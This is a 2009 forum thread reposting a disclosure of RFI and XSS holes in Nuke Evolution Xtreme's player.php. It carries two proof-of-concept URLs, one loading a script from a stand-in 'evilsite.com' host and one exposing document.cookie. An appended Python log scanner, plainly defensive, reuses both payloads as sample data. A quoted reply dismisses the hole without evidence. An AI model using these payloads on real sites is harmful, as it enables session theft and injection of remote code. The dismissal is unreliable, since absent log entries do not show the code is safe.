www.clanthemes.com :: View topic - Nuke evolution extreme: vulnerabilities ( rfi + xss)
Snype
Post Nuke evolution extreme: vulnerabilities ( rfi + xss) Posted: Fri Apr 17, 2009 12:09 pm

Title: Nuke Evolution Extreme: Vulnerabilities ( RFI + XSS)

Vendor: http://evolution-xtreme.com

Discovered by : baxr6

File affected: player.php

This file is extremely buggy. Sanitize variables properly.

Quote:
proofs of concept:
RFI Example: http://www.site.com/path/player.php?&defaultVisualExt=1<ScRiPt+src=http://evilsite.com/gobaby.js? you get the picture :)
XSS Example: http://www.site.com/path/player.php?&defaultVisualExt=1>"><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>


This was posted at Future Nuke and I also just found it on the Xtreme site, so I just copied and pasted it here.

Quote:
I've been running Xtreme since before it was even released as my main site. I've never encountered any logs referring to this kind of hole. I wouldn't worry about it, as they think they know everything when really I think they're just worried that Evo Xtreme will take their users and Platinum will die.

If it's been fine for me this whole time since it was in BETA, there sure as hell ain't nothing wrong with it.
 

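A log check for the requests described in the post above, as an added example that is not part of the original thread or of the Evolution Xtreme code: it scans access-log lines for player.php hits whose defaultVisualExt value carries markup. The combined log format, the constructed sample lines and the function name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: benign values are plain tokens such as "1", so quotes,
# angle brackets, "script" or a URL scheme in the value are worth flagging.
SUSPICIOUS_RE = re.compile(r'[<>"\']|script|://', re.IGNORECASE)


def suspicious_player_requests(log_lines, param="defaultVisualExt"):
    """Return (line_number, decoded_value) for flagged player.php requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/player.php"):
            continue
        # parse_qsl percent-decodes values and maps '+' to a space, so
        # encoded payloads are compared in their decoded form.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == param and SUSPICIOUS_RE.search(value):
                hits.append((number, value))
    return hits


# Constructed sample lines; the two flagged requests reuse the strings
# quoted in the post, percent-encoded as a browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2009:12:01:00 +0000] '
    '"GET /path/player.php?defaultVisualExt=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Apr/2009:12:02:10 +0000] '
    '"GET /path/player.php?&defaultVisualExt=1%3CScRiPt+src='
    'http://evilsite.com/gobaby.js? HTTP/1.1" 200 512',
    '203.0.113.5 - - [17/Apr/2009:12:03:00 +0000] '
    '"GET /index.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [17/Apr/2009:12:04:30 +0000] '
    '"GET /path/player.php?&defaultVisualExt=1%3E%22%3E%3CScRiPt%20%0a%0d'
    '%3Ealert(document.cookie)%3B%3C/ScRiPt%3E HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in suspicious_player_requests(SAMPLE_LOG):
        print(f"line {number}: {value!r}")
```

An empty result only says that no such request was logged in the lines scanned; it does not show that player.php handles the parameter safely.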

Amay_Zing
Post Nuke evolution extreme: vulnerabilities ( rfi + xss) Posted: Fri Apr 17, 2009 3:05 pm

Yes, I saw that too. Do you think there will be a fix soon?
 

 